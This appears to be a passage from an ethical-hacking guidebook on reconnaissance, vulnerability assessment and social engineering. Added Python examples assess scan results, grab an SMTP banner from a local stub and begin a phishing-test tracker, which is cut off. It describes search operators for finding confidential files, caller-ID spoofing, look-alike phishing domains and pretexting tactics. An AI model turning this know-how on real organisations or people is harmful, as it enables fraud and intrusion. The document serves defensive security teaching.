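SAMPLE_SCAN = """
10.0.0.5 tcp/25
10.0.0.5 tcp/443
10.0.0.5 tcp/993
10.0.0.7 tcp/80
10.0.0.7 tcp/445
10.0.0.7 udp/137
10.0.0.9 icmp/echo
10.0.0.9 tcp/21
10.0.0.9 tcp/23
10.0.0.9 tcp/3389
"""

if __name__ == "__main__":
    for host, result in assess(SAMPLE_SCAN, external=True).items():
        print(host)
        for line in result["services"]:
            print("  finding:", line)
        for line in result["exposed"]:
            print("  EXPOSED:", line)
```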
If a service doesn't respond on a TCP or UDP port, that doesn't mean it's not running. You may have to dig further to find out.
If you detect a web server running on the system that you test, you can check the software version by using one of the following methods:
- Type the site's name followed by a page that you know doesn't exist, such as www.your_domain.com/1234.html. Many web servers return an error page showing detailed version information.
- Use Netcraft's What's that site running? search utility (www.netcraft.com), which connects to your server from the Internet and displays the web server version and operating system, as shown in Figure 4-1.
Figure 4-1: Netcraft's web server version utility.
You can dig deeper for more specific information on your hosts:
- NMapWin (http://sourceforge.net/projects/nmapwin) can determine the system OS version.
- An enumeration tool (such as SoftPerfect Network Scanner at www.softperfect.com/products/networkscanner) can extract users, groups, and file and share permissions directly from Windows.
- Many systems return useful banner information when you connect to a service or application running on a port. For example, if you telnet to an e-mail server on port 25 by entering telnet mail.your_domain.com 25 at a command prompt, you may see something like this:
220 mail.your_domain.com ESMTP all_the_version_info_you_need_to_hack Ready
Most e-mail servers return detailed information, such as the version and the current service pack installed. After you have this information, you (and the bad guys) can determine the vulnerabilities of the system from some of the websites listed in the next section.
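The banner grab just described, as an added Python example that is not code from the book: it reads the greeting an SMTP service volunteers on connect, parses it, and reports whether the banner says more than it should. To run offline it talks to a throwaway stub on the loopback interface that answers with a constructed banner modelled on the chapter's sample line; point grab_banner() at your own mail server on port 25 to check what it discloses.

```python
"""Grab and inspect an SMTP greeting banner, as the chapter describes doing with telnet.

Added example, not code from the book. It runs offline against a throwaway
local stub that replies with a constructed banner modelled on the chapter's
sample; point grab_banner() at your own mail server (port 25) to check what
it volunteers.
"""
import re
import socket
import threading

# Constructed banner, modelled on the chapter's example line.
STUB_BANNER = (b"220 mail.your_domain.com ESMTP "
               b"all_the_version_info_you_need_to_hack Ready\r\n")


def start_stub_smtp(banner=STUB_BANNER):
    """Listen on a random loopback port, send one banner, then close. Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def grab_banner(host, port, timeout=3.0):
    """Connect and read the first line the service volunteers, like telnet shows."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        data = b""
        while not data.endswith(b"\n") and len(data) < 1024:
            chunk = s.recv(256)
            if not chunk:
                break
            data += chunk
    return data.decode("ascii", "replace").strip()


# "<code> <hostname> [ESMTP|SMTP] <whatever the server adds>"
BANNER_RE = re.compile(r"^(\d{3})[ -](\S+)\s*(?:ESMTP|SMTP)?\s*(.*?)\s*$")
VERSION_RE = re.compile(r"\b\d+(?:\.\d+)+\b")


def parse_smtp_banner(banner):
    """Split a greeting into reply code, hostname, extra text and any version number."""
    m = BANNER_RE.match(banner)
    if not m:
        return None
    code, host, extra = m.groups()
    version = VERSION_RE.search(extra)
    return {"code": int(code), "host": host, "extra": extra,
            "version": version.group(0) if version else None}


def banner_leaks_detail(banner):
    """Defender check: True when the greeting says more than hostname plus a greeting word."""
    parsed = parse_smtp_banner(banner)
    if parsed is None or parsed["code"] != 220:
        return False
    words = [w for w in parsed["extra"].split() if w.lower() not in ("ready", "hello")]
    return bool(words)


if __name__ == "__main__":
    port = start_stub_smtp()
    banner = grab_banner("127.0.0.1", port)
    print("banner:", banner)
    print("parsed:", parse_smtp_banner(banner))
    print("leaks detail:", banner_leaks_detail(banner))
```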
An e-mail to an invalid address might return with detailed e-mail header information. A bounced message often discloses information that can be used against you, including internal IP addresses and software versions. On certain Windows systems, you can use this information to establish unauthenticated connections and sometimes even map drives. I cover these issues in Chapter 12.
Assessing Vulnerabilities
After finding potential security holes, the next step is to confirm whether they're indeed vulnerabilities in the context of your environment. Before you test, perform some manual searching. You can research websites and vulnerability databases, such as these:
- Common Vulnerabilities and Exposures (http://cve.mitre.org/cve)
- US-CERT Vulnerability Notes Database (www.kb.cert.org/vuls)
- NIST National Vulnerability Database (http://nvd.nist.gov)
These sites list known vulnerabilities — at least the formally classified ones. As I explain in this book, you see that many other vulnerabilities are more generic in nature and can't easily be classified. If you can't find a vulnerability documented on one of these sites, search the vendor's site. You can also find a list of commonly exploited vulnerabilities at www.sans.org/critical-security-controls. This site contains the SANS Critical Security Controls consensus list, which is compiled and updated by the SANS organization.
If you don't want to research your potential vulnerabilities and can jump right into testing, you have a couple of options:
- Manual assessment: You can assess the potential vulnerabilities by connecting to the ports that are exposing the service or application and poking around in these ports. You should manually assess certain systems (such as web applications). The vulnerability reports in the preceding databases often disclose how to do this — at least generally. If you have a lot of free time, performing these tests manually might work for you.
- Automated assessment: Manual assessments are a great way to learn, but people usually don't have the time for most manual steps. If you're like me, you'll scan for vulnerabilities automatically when you can and then dig around manually as needed.
Many great vulnerability assessment scanners test for flaws on specific platforms (such as Windows and Linux) and types of networks (either wired or wireless). They test for specific system vulnerabilities and some focus around standards like the SANS Critical Security Controls and the Open Web Application Security Project (www.owasp.org). Some scanners can map out the business logic within a web application; others can map out a view of the network; others can help software developers test for code flaws. The drawback to these tools is that they find only individual vulnerabilities; they often don't necessarily aggregate and correlate vulnerabilities across an entire network. That's where your skills, and the methodologies I share in this book, come into play!
One of my favorite security tools is a vulnerability scanner called Nexpose by Rapid7 (www.rapid7.com/products/nexpose). It's both a port scanner and vulnerability assessment tool, and it offers a great deal of help for vulnerability management. You can run one-time scans immediately or schedule scans to run on a periodic basis.
As with most good security tools, you pay for Nexpose. It isn't the least expensive tool, but you definitely get what you pay for, especially when it comes to others taking you seriously (such as when PCI DSS compliance is required of your business). There's also a free version of Nexpose dubbed the Community Edition for scanning smaller networks with fewer features. Additional vulnerability scanners that work well include QualysGuard (www.qualys.com) and GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions).
Assessing vulnerabilities with a tool like Nexpose requires follow-up expertise. You can't rely on the scanner results alone. You must validate the vulnerabilities it reports. Study the reports to base your recommendations on the context and criticality of the tested systems.
Penetrating the System
You can use identified security vulnerabilities to do the following:
- Gain further information about the host and its data.
- Obtain a remote command prompt.
- Start or stop certain services or applications.
- Access other systems.
- Disable logging or other security controls.
- Capture screenshots.
- Access sensitive files.
- Send an e-mail as the administrator.
- Perform SQL injection.
- Launch a DoS attack.
- Upload a file or create a backdoor user account proving the exploitation of a vulnerability.
Metasploit (www.metasploit.com) is great for exploiting many of the vulnerabilities you find and allows you to fully penetrate many types of systems. Ideally, you've already made your decision on whether to fully exploit the vulnerabilities you find. You might want to leave well enough alone by just demonstrating the existence of the vulnerabilities and not actually exploiting them.
If you want to further delve into the ethical hacking methodology, I recommend you check out the Open Source Security Testing Methodology Manual (www.isecom.org/research/osstmm.html) for more information.
Putting Security Testing in Motion
Find out how to look for the most common security flaws in a free article at www.dummies.com/extras/hacking.
In this part… Let the games begin! You've waited long enough — now's the time to start testing the security of your systems. But where do you start? How about with your three Ps — your people, your physical systems, and your passwords? These are, after all, three of the most easily and commonly attacked targets in your organization.
This part starts with a discussion of hacking people (otherwise known as social engineering). It then goes on to look at physical security vulnerabilities. Of course, I'd be remiss in a part about people if I skipped passwords, so I cover the technical details of testing those as well. This is a great way to get the ball rolling to warm you up for the more specific security tests later in the book.
Information Gathering
In This Chapter
- Gleaning information about your organization from the Internet
- Web resources
- Seeking out information you (and others) can benefit from
One of the most important aspects in determining how your organization is at risk is to find out what information is publicly available about your business and your systems. Gathering this information is such an important part of your overall methodology that I thought the subject deserves a dedicated chapter. In this chapter, I outline some free and easy ways to see what the world sees about you and your organization. You may be tempted to bypass this exercise in favor of the cooler and sexier technical security flaws, but don't fall into the trap. Gathering this type of information is critical and often where most security breaches begin.
Gathering Public Information
The amount of information you can gather about an organization's business and information systems that is widely available on the Internet is staggering. To see for yourself, the techniques outlined in the following sections can be used to gather information about your own organization.
Social media
Social media sites are the new means for businesses interacting online. Perusing the following sites can provide untold details on any given business and its people:
- Facebook (www.facebook.com)
- LinkedIn (www.linkedin.com)
- Twitter (https://twitter.com)
- YouTube (www.youtube.com)
As we've all witnessed, employees are often very forthcoming about what they do for work, details about their business, and even what they think about their bosses — especially after throwing back a few when their social filter has gone off track! I've also found interesting insight based on what ex-employees say about their former employers at Glassdoor (www.glassdoor.com).
Web search
Performing a web search or simply browsing your organization's website can turn up the following information:
- Employee names and contact information
- Important company dates
- Incorporation filings
- SEC filings (for public companies)
- Press releases about physical moves, organizational changes, and new products
- Mergers and acquisitions
- Patents and trademarks
- Presentations, articles, webcasts, or webinars
Bing (www.bing.com) and Google (www.google.com) ferret out information — in everything from word processing documents to graphics files — on any publicly accessible computer. And they're free. Google is my favorite. Entire books have been written about using Google, so expect any criminal hacker to be quite experienced in using this tool, including against you. (See Chapter 15 for more about Google hacking.)
With Google, you can search the Internet in several ways:
- Typing keywords. This kind of search often reveals hundreds and sometimes millions of pages of information — such as files, phone numbers, and addresses — that you never guessed were available.
- Performing advanced web searches. Google's advanced search options can find sites that link back to your company's website. This type of search often reveals a lot of information about partners, vendors, clients, and other affiliations.
- Using switches to dig deeper into a website. For example, if you want to find a certain word or file on your website, simply enter a line like one of the following into Google:
site:www.your_domain.com keyword
site:www.your_domain.com filename
You can even do a generic filetype search across the entire Internet to see what turns up, such as this:
filetype:swf company_name
Use the preceding search to find Flash .swf files, which can be downloaded and decompiled to reveal sensitive information that can be used against your business, as I cover in detail in Chapter 15.
Use the following search to hunt for PDF documents that might contain sensitive information that can be used against your business:
filetype:pdf company_name confidential
Web crawling
Web-crawling utilities, such as HTTrack Website Copier (www.httrack.com), can mirror your website by downloading every publicly accessible file from it, similar to how a web vulnerability scanner crawls the website it's testing. You can then inspect that copy of the website offline, digging into the following:
- The website layout and configuration
- Directories and files that might not otherwise be obvious or readily accessible
- The HTML and script source code of web pages
- Comment fields
Comment fields often contain useful information such as names and e-mail addresses of the developers and internal IT personnel, server names, software versions, internal IP addressing schemes, and general comments about how the code works. In case you're interested, you can prevent some types of web crawling by creating Disallow entries in your web server's robots.txt file as outlined at www.w3.org/TR/html4/appendix/notes.html. You can even enable web tarpitting in certain firewalls and intrusion prevention systems (IPSs). However, crawlers (and attackers) that are smart enough can find ways around these controls.
Contact information for developers and IT personnel is great for social engineering attacks. I cover social engineering in Chapter 6.
Websites
The following websites may provide specific information about an organization and its employees:
- Government and business websites:
  - www.hoovers.com and http://finance.yahoo.com give detailed information about public companies.
  - www.sec.gov/edgar.shtml shows SEC filings of public companies.
  - www.uspto.gov offers patent and trademark registrations.
  - The website for your state's Secretary of State or similar organization can offer incorporation and corporate officer information.
- Background checks and other personal information, from websites such as:
  - LexisNexis.com (www.lexisnexis.com)
  - ZabaSearch (www.zabasearch.com)
Mapping the Network
As part of mapping out your network, you can search public databases and resources to see what other people know about your systems.
WHOIS
The best starting point is to perform a WHOIS lookup by using any one of the tools available on the Internet. In case you're not familiar, WHOIS is a protocol you can use to query online databases such as DNS registries to learn more about domain names and IP address blocks. You may have used WHOIS to check whether a particular Internet domain name is available.
For security testing, WHOIS provides the following information that can give a hacker a leg up to start a social engineering attack or to scan a network:
- Internet domain name registration information, such as contact names, phone numbers, and mailing addresses
- DNS servers responsible for your domain
You can look up WHOIS information at one of the following places:
- WHOIS.net (www.whois.net)
- A domain registrar's site, such as www.godaddy.com
- Your ISP's technical support site
Two of my favorite WHOIS tool websites are DNSstuff (www.dnsstuff.com) and MXToolBox (www.mxtoolbox.com). For example, you can run DNS queries directly from www.mxtoolbox.com to do the following:
- Display general domain-registration information
- Show which host handles e-mail for a domain (the Mail Exchanger or MX record)
- Map the location of specific hosts
- Determine whether the host is listed on certain spam blacklists
A free site you can use for more basic Internet domain queries is http://dnstools.com. Another commercial product called NetScanTools Pro (www.netscantools.com) is excellent at gathering such information. I cover this tool and others in more detail in Chapter 9.
The following list shows various lookup sites for other categories:
- U.S. Government: www.dotgov.gov/portal/web/dotgov/whois
- AFRINIC: www.afrinic.net (Regional Internet Registry for Africa)
- APNIC: www.apnic.net/apnic-info/whois_search (Regional Internet Registry for the Asia Pacific Region)
- ARIN: http://whois.arin.net/ui (Regional Internet Registry for North America, a portion of the Caribbean, and subequatorial Africa)
- LACNIC: www.lacnic.net/en (Latin American and Caribbean Internet Addresses Registry)
- RIPE Network Coordination Centre: https://apps.db.ripe.net/search/query.html (Europe, Central Asia, African countries north of the equator, and the Middle East)
If you're not sure where to look for a specific country, www.nro.net/about-the-nro/list-of-country-codes-and-rirs-ordered-by-country-code has a reference guide.
Privacy policies
Check your website's privacy policy. A good practice is to let your site's users know what information is collected and how it's being protected, but nothing more. I've seen many privacy policies that divulge a lot of technical details on security and related systems that should not be made public.
Make sure the people who write your privacy policies (often nontechnical lawyers) don't divulge details about your information security infrastructure. Be careful to avoid the example of an Internet start-up businessman who once contacted me about a business opportunity. During the conversation, he bragged about his company's security systems that ensured the privacy of client information (or so he thought). I went to his website to check out his privacy policy. He had posted the brand and model of firewall he was using, along with other technical information about his network and system architecture. This type of information could certainly be used against him by the bad guys. Not a good idea.
Social Engineering
In This Chapter
- Understanding social engineering
- Examining the ramifications of social engineering
- Performing social engineering tests
- Protecting your organization against social engineering
Social engineering takes advantage of the weakest link in any organization's information security defenses: people. Social engineering is "people hacking" and involves maliciously exploiting the trusting nature of human beings to obtain information that can be used for personal gain.
Social engineering is one of the toughest hacks to perpetrate because it takes bravado and skill to come across as trustworthy to a stranger. It's also by far the toughest thing to protect against because people who are making their own security decisions are involved. In this chapter, I explore the consequences of social engineering, techniques for your own ethical hacking efforts, and specific countermeasures to defend against social engineering.
Introducing Social Engineering
In a social engineering scenario, those with ill intent pose as someone else to gain information they likely couldn't access otherwise. They then take the information they obtain from their victims and wreak havoc on network resources, steal or delete files, and even commit corporate espionage or some other form of fraud against the organization they attack. Social engineering is different from physical security exploits, such as shoulder surfing and dumpster diving, but the two types of hacking are related and often are used in tandem.
Here are some examples of social engineering:
- "Support personnel" claiming that they need to install a patch or new version of software on a user's computer, talk the user into downloading the software, and obtain remote control of the system.
- "Vendors" claiming to need to update the organization's accounting package or phone system, ask for the administrator password, and obtain full access.
- "Employees" notifying the security desk that they have lost their access badge to the data center, receive a set of keys from security, and obtain unauthorized access to physical and electronic information.
- Phishing e-mails sent by whomever to gather user IDs and passwords of unsuspecting recipients. These attacks can be generic in nature or more targeted — something called spear-phishing attacks. The criminals then use those passwords to install malware, gain access to the network, capture intellectual property, and more.
Sometimes, social engineers act as confident and knowledgeable managers or executives. At other times they might play the roles of extremely uninformed or naïve employees. They also might pose as outsiders, such as IT consultants or maintenance workers. Social engineers are great at adapting to their audience. It takes a special type of personality to pull this off, often resembling that of a sociopath.
Effective information security — especially the security required for fighting social engineering — often begins and ends with your users. Other chapters in this book provide advice on technical controls that can help fight social engineering, but never forget that basic human communications and interaction have a profound effect on the level of security in your organization at any given time. The candy-security adage is "Hard, crunchy outside; soft, chewy inside." The hard, crunchy outside is the layer of mechanisms — such as firewalls, intrusion prevention systems, and content filtering — that organizations typically rely on to secure their information. The soft, chewy inside is the people and the processes inside the organization. If the bad guys can get past the thick outer layer, they can compromise the (mostly) defenseless inner layer.
Starting Your Social Engineering Tests
I approach the ethical hacking methodologies in this chapter differently than in subsequent chapters. Social engineering is an art and a science. Social engineering takes great skill to perform as a security professional and is highly dependent on your personality and overall knowledge of the organization.
If social engineering isn't natural for you, consider using the information in this chapter for educational purposes so you can learn how to best defend against it. Don't hesitate to hire a third party to perform this testing if that makes the best business sense for now.
Social engineering can harm people's jobs and reputations, and confidential information could be leaked. This is especially true when phishing tests are performed. Plan things out and proceed with caution.
You can perform social engineering attacks in millions of ways. From walking through the front door purporting to be someone you're not to launching an all-out e-mail phishing campaign, the world is your oyster. For this reason, and because training specific behaviors in a single chapter is next to impossible, I don't provide how-to instructions for carrying out social engineering attacks. Instead, I describe specific social engineering scenarios that have worked well for me and others. You can tailor these same tricks and techniques to your specific situation.
An outsider to the organization might perform certain social engineering techniques such as physical intrusion tests best. If you perform these tests against your own organization, acting as an outsider might be difficult if everyone knows you. This risk of recognition might not be a problem in larger organizations, but if you have a small, close-knit company, people might catch on.
You can outsource social engineering testing to an outside firm or even have a trusted colleague perform the tests for you. I cover the topic of outsourcing security and ethical hacking in Chapter 19.
Why Attackers Use Social Engineering
People use social engineering to break into systems and attain information because it's often the simplest way for them to get what they're looking for. They'd much rather have someone open the door to the organization than physically break in and risk being caught. Security technologies such as firewalls and access controls won't stop a determined social engineer.
Many social engineers perform their attacks slowly to avoid suspicion. Social engineers gather bits of information over time and use the information to create a broader picture of the organization they're trying to manipulate. Therein lies one of their greatest assets: time. They've got nothing but time and will take the proper amount necessary to ensure their attacks are successful. Alternatively, some social engineering attacks can be performed with a quick phone call or e-mail. The methods used depend on the attacker's style and abilities. Either way, you're at a disadvantage.
Social engineers know that many organizations don't have formal data classification programs, access control systems, incident response plans, or security awareness programs, and they take advantage of these weaknesses.
Social engineers often know a little about a lot of things — both inside and outside their target organizations — because this knowledge helps them in their efforts. Thanks to social media such as LinkedIn, Facebook, and other online resources I discuss in Chapter 5, every tidbit of information they need is often at their disposal. The more information social engineers gain about organizations, the easier it is for them to pose as employees or other trusted insiders. Social engineers' knowledge and determination give them the upper hand over management and their employees who don't recognize the value of the information that social engineers seek.
Understanding the Implications
Many organizations have enemies who want to cause trouble through social engineering. These people might be current or former employees seeking revenge, competitors wanting a leg up, or hackers trying to prove their worth.
Regardless of who causes the trouble, every organization is at risk — especially given the sprawling Internet presence of the average company. Larger companies spread across several locations are often more vulnerable given their complexity, but smaller companies can also be attacked. Everyone, from receptionists to security guards to executives to IT personnel, is a potential victim of social engineering. Help desk and call center employees are especially vulnerable because they are trained to be helpful and forthcoming with information.
Social engineering has serious consequences. Because the objective of social engineering is to coerce someone for information to lead to ill-gotten gains, anything is possible. Effective social engineers can obtain the following information:
- User passwords
- Security badges or keys to the building and even to the computer room
- Intellectual property such as design specifications, source code, or other research and development documentation
- Confidential financial reports
- Private and confidential employee information
- Personally identifiable information (PII) such as health records and cardholder information
- Customer lists and sales prospects
If any of the preceding information is leaked, financial losses, lowered employee morale, decreased customer loyalty, and even legal and regulatory compliance issues could result. The possibilities are endless.
Social engineering attacks are difficult to protect against for various reasons. For one thing, they aren't well documented. For another, social engineers are limited only by their imaginations. Also, because so many possible methods exist, recovery and protection are difficult after the attack. Furthermore, the hard, crunchy outside of firewalls and intrusion prevention systems often creates a false sense of security, making the problem even worse.
With social engineering, you never know the next method of attack. The best things you can do are to remain vigilant, understand the social engineer's motives and methodologies, and protect against the most common attacks through ongoing security awareness in your organization. I discuss how you can do this in the rest of this chapter.
Building trust
Trust — so hard to gain, yet so easy to lose. Trust is the essence of social engineering. Most people trust others until a situation forces them not to. People want to help one another, especially if trust can be built and the request for help seems reasonable. Most people want to be team players in the workplace and don't realize what can happen if they divulge too much information to a source who shouldn't be trusted. This trust allows social engineers to accomplish their goals. Of course, building deep trust often takes time. Crafty social engineers can gain it within minutes or hours. How do they do it?
- Likability: Who can't relate to a nice person? Everyone loves courtesy. The friendlier social engineers are — without going overboard — the better their chances of getting what they want. Social engineers often begin to build a relationship by establishing common interests. They often use the information they gain in the research phase to determine what the victim likes and to pretend that they like those things, too. They can phone victims or meet them in person and, based on information the social engineers have discovered about the person, start talking about local sports teams or how wonderful it is to be single again. A few low-key and well-articulated comments can be the start of a nice new relationship.
- Believability: Believability is based in part on the knowledge social engineers have and how likable they are. Social engineers also use impersonation — perhaps by posing as new employees or fellow employees that the victim hasn't met. They may even pose as vendors who do business with the organization. They often modestly claim authority to influence people. The most common social engineering trick is to do something nice so that the victim feels obligated to be nice in return or to be a team player for the organization.
Exploiting the relationship
After social engineers obtain the trust of their unsuspecting victims, they coax the victims into divulging more information than they should. Whammo — the social engineer can go in for the kill. Social engineers do this through face-to-face or electronic communication that victims feel comfortable with, or they use technology to get victims to divulge information.
Deceit through words and actions
Wily social engineers can get inside information from their victims in many ways. They are often articulate and focus on keeping their conversations moving without giving their victims much time to think about what they're saying. However, if they're careless or overly anxious during their social engineering attacks, the following tip-offs might give them away:
- Acting overly friendly or eager
- Mentioning names of prominent people within the organization
- Bragging about authority within the organization
- Threatening reprimands if requests aren't honored
- Acting nervous when questioned (pursing the lips and fidgeting — especially the hands and feet because controlling body parts that are farther from the face requires more conscious effort)
- Overemphasizing details
- Experiencing physiological changes, such as dilated pupils or changes in voice pitch
- Appearing rushed
- Refusing to give information
- Volunteering information and answering unasked questions
- Knowing information that an outsider should not have
- Using insider speech or slang as a known outsider
- Asking strange questions
- Misspelling words in written communications
A good social engineer isn't obvious with the preceding actions, but these are some of the signs that malicious behavior is in the works. Of course, if the person is a sociopath or psychopath, your experience may vary. (Psychology For Dummies by Adam Cash is a good resource for such complexities of the human mind.)
Social engineers often do a favor for someone and then turn around and ask that person if he or she would mind helping them. This common social engineering trick works pretty well. Social engineers also often use what's called reverse social engineering. This is where they offer help if a specific problem arises; some time passes, the problem occurs (often by their doing), and then they help fix the problem — not unlike politicians in Washington, DC! They may come across as heroes, which can further their cause. Social engineers might ask an unsuspecting employee for a favor. Yes — they just outright ask for a favor. Many people fall for this trap.
Impersonating an employee is easy. Social engineers can wear a similar-looking uniform, make a fake ID badge, or simply dress like the real employees. People think, "Hey — he looks and acts like me, so he must be one of us." Social engineers also pretend to be employees calling from an outside phone line. This trick is an especially popular way of exploiting help desk and call center personnel. Social engineers know that these employees fall into a rut easily because their tasks are repetitive, such as saying, "Hello, can I get your customer number, please?"
Deceit through technology
Technology can make things easier — and more fun — for the social engineer. Often, a malicious request for information comes from a computer or other electronic entity that the victims think they can identify. But spoofing a computer name, an e-mail address, a fax number, or a network address is easy. Fortunately, you can take a few countermeasures against this type of attack, as described in the next section.

Hackers can deceive through technology by sending e-mail that asks victims for critical information. Such an e-mail usually provides a link that directs victims to a professional- and legitimate-looking website that "updates" such account information as user IDs, passwords, and Social Security numbers. They might also do this on social networking sites, such as Facebook and Myspace.

Many spam and phishing messages also use this trick. Most users are inundated with so much spam and other unwanted e-mail that they often let their guard down and open e-mails and attachments they shouldn't. These e-mails usually look professional and believable. They often dupe people into disclosing information they should never give in exchange for a gift. These social engineering tricks also occur when a hacker who has already broken into the network sends messages or creates fake Internet pop-up windows. The same tricks have occurred through instant messaging and cell phone messaging.

In some well-publicized incidents, hackers e-mailed their victims a patch purporting to come from Microsoft or another well-known vendor. Users think it looks like a duck and it quacks like a duck — but it's not the right duck! The message is actually from a hacker wanting the user to install the "patch," which installs a Trojan-horse keylogger or creates a backdoor into computers and networks. Vendors such as Microsoft do not distribute patches as e-mail attachments; real updates arrive through the vendor's own update mechanism, which is a simple rule users can be taught. Hackers use these backdoors to hack into the organization's systems or use the victims' computers (known as zombies) as launching pads to attack another system. Even viruses and worms can use social engineering. For instance, the Love Bug worm told users they had a secret admirer. When the victims opened the e-mail, it was too late. Their computers were infected (and perhaps worse, they didn't have a secret admirer).

The Nigerian 419 e-mail fraud scheme attempts to access unsuspecting people's bank accounts and money. These social engineers — I mean scamsters — offer to transfer millions of dollars to the victim to repatriate a deceased client's funds to the United States. All the victim must provide is personal bank-account information and a little money up front to cover the transfer expenses. Victims then have their bank accounts emptied. This trap has been around for a while, and it's a shame that people still fall for it.

Many computerized social engineering tactics can be performed anonymously through Internet proxy servers, anonymizers, remailers, and basic SMTP servers that have an open relay. When people fall for requests for confidential personal or corporate information, the sources of these social engineering attacks are often impossible to track.
Performing Social Engineering Attacks
The process of social engineering is actually pretty basic. Generally, social engineers discover the details on people, organizational processes, and information systems to perform their attacks. With this information, they know what to pursue. Social engineering attacks are typically carried out in four simple steps:
1. Perform research.
2. Build trust.
3. Exploit relationships for information through words, actions, or technology.
4. Use the information gathered for malicious purposes.

These steps can include numerous substeps and techniques, depending on the attack being performed.

Before social engineers perform their attacks, they need a goal. This is the first step in these attackers' processes for social engineering, and this goal is most likely already implanted in their minds. What do they want to accomplish? What are the social engineers trying to hack? Why? Do they want intellectual property, server passwords, or is it access they desire? Or, do they simply want to prove that the company's defenses can be penetrated? In your efforts as a security professional performing social engineering, determine this overall goal before you begin. Otherwise, you'll just be wandering aimlessly, creating unnecessary headaches and risks for you and others along the way.

Seeking information
After social engineers have a goal in mind, they typically start the attack by gathering public information about their victim(s). Many social engineers acquire information slowly over time so they don't raise suspicion. Obvious information gathering is a tip-off when defending against social engineering. I mention other warning signs to be aware of throughout the rest of this chapter.

Regardless of the initial research method, all a criminal might need to penetrate an organization is an employee list, a few key internal phone numbers, the latest news from a social media website, or a company calendar. Chapter 5 covers more details on information gathering, but the following are worth calling out.

Using the Internet
Today's basic research medium is the Internet. A few minutes searching on Google or other search engines, using simple keywords, such as the company name or specific employees' names, often produces a lot of information. You can find even more information in SEC filings at www.sec.gov and at such sites as www.hoovers.com and http://finance.yahoo.com. Many organizations — especially their management — would be dismayed to discover the organizational information that's available online!

Given the plethora of such information, it's often enough to start a social engineering attack.

Criminals can pay just a few dollars for a comprehensive online background check on individuals, executives included. These searches turn up practically all public — and sometimes private — information about a person in minutes.
Dumpster diving
Dumpster diving is a little more risky — and it's certainly messy. But it's a highly effective method of obtaining information. This method involves literally rummaging through trash cans for information about a company.

Dumpster diving can turn up even the most confidential of information because some people assume that their information is safe after it goes into the trash. Most people don't think about the potential value of the paper they throw away. And I'm not just talking about the recycle value! These documents often contain a wealth of information that gives the social engineer what's needed to penetrate the organization. The astute social engineer looks for the following hard-copy documents:
Internal phone lists
Organizational charts
Employee handbooks, which often contain security policies
Network diagrams
Password lists
Meeting notes
Spreadsheets and reports
Customer records
Printouts of e-mails that contain confidential information

Shredding documents is effective only if the paper is cross-shredded into tiny pieces of confetti. Inexpensive shredders that shred documents only in long strips are basically worthless against a determined social engineer. With a little time and tape, a savvy hacker can piece a document back together if that's what he's determined to do.

Hackers often gather confidential personal and business information from others by listening in on conversations held in restaurants, coffee shops, and airports. People who speak loudly when talking on their cell phones are also a great source of sensitive information for social engineers. (Poetic justice, perhaps?) Airplanes are a great place for shoulder surfing and gathering sensitive information. While I'm out and about in public places and on airplanes, I hear and see an amazing amount of private information. You can hardly avoid it!

The bad guys also look in the trash for USB drives, DVDs, and other media. See Chapter 7 for more on trash and other physical security issues, including countermeasures for protecting against dumpster divers.
Phone systems
Attackers can obtain information by using the dial-by-name feature built into most voicemail systems. To access this feature, you usually just press 0 or # after calling the company's main number or after you enter someone's voicemail box. This trick works best after hours to ensure no one answers.

Social engineers can find interesting bits of information, at times, such as when their victims are out of town, just by listening to voicemail messages. They can even study victims' voices by listening to their voicemail messages, podcasts, or webcasts so they can learn to impersonate those people.

Attackers can protect their identities if they can hide where they call from. Here are some ways they can hide their locations:

Residential phones sometimes can hide their numbers from caller ID by dialing *67 before the phone number. This feature isn't effective when calling toll-free numbers (800, 888, 877, 866) or 911, because those lines receive the calling number through ANI (automatic number identification), which *67 does not suppress. Disposable cell phones and VoIP services work quite well, however.

Business phones in an office using a phone switch are more difficult to spoof. However, all the attacker usually needs is the user guide and administrator password for the phone switch software. In many switches, the attacker can enter the source number — including a falsified number, such as the victim's home phone number. VoIP servers such as the open source Asterisk (www.asterisk.org) can be configured to send any caller ID number the attacker wants.
Phishing e-mails
The latest, and often most successful, means for hacking is carried out via e-mail phishing, in which criminals send bogus e-mails to potential victims in an attempt to get them to divulge sensitive information or click malicious links that lead to malware infections. Phishing has actually been around for years, but it has recently gained greater visibility given some high-profile exploits against seemingly impenetrable businesses and federal government agencies. Phishing's effectiveness is amazing, and the consequences are often ugly. I'm seeing success rates (or failure rates, depending on how you look at it) as high as 60–70 percent in my own phishing testing. A well-worded e-mail is all it takes to glean passwords, access sensitive information, or inject malware into targeted computers.

You can perform your own phishing exercises. A rudimentary, yet highly effective, method is to set up an e-mail account on your domain, or ideally, a domain that looks similar to yours at a glance, request information or link to a website that collects information, send e-mails to employees or other users you want to test, and see what they do. Do they open the e-mail, click the link, divulge information, or — if you're lucky — none of the above? It's really as simple as that. Two practical rules: agree the scope in writing with management before you send anything, and have the landing page record only that a submission occurred rather than storing whatever password the user typed.

Be it today's rushed world of business, general user gullibility, or downright ignorance, it's amazing how susceptible the average person is to phishing e-mail exploits. A good phishing e-mail that has a greater chance of being opened and responded to creates a sense of urgency and provides information that presumably only an insider would know. Beyond that, many phishing e-mails are easy to spot because they often:
Have typographical errors
Contain generic salutations and e-mail signatures
Ask the user to directly click on a link
Solicit sensitive information

A more formal means for executing your phishing tests is to use a tool made specifically for the job. There are commercial options available on the Internet such as LUCY (http://phishing-server.com) as well as freebies such as Simple Phishing Toolkit (https://github.com/sptoolkit/sptoolkit), which is no longer supported but can still be used for this type of testing. With both options, you have access to pre-installed e-mail templates, the ability to scrape (copy pages from) live websites so you can customize your own campaign, and various reporting capabilities so you can track which e-mail users are taking the bait and failing your tests.
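The do-it-yourself exercise above needs one piece of bookkeeping that is easy to get wrong: attributing each open, click and form submission to a specific recipient so you can report a failure rate. The following Python is an added example written for this page, not code from the book or from LUCY or Simple Phishing Toolkit; the look-alike domain, the campaign secret, the recipients and the access-log lines are all constructed. It issues a per-recipient HMAC token, embeds it in the lure link, then reads the landing site's access log to work out who opened, clicked or submitted.

```python
"""Bookkeeping for a do-it-yourself phishing test (added example; not from the book).

Every recipient gets a unique token in the lure link, so opens, clicks and
form submissions on the landing page can be attributed to one person and the
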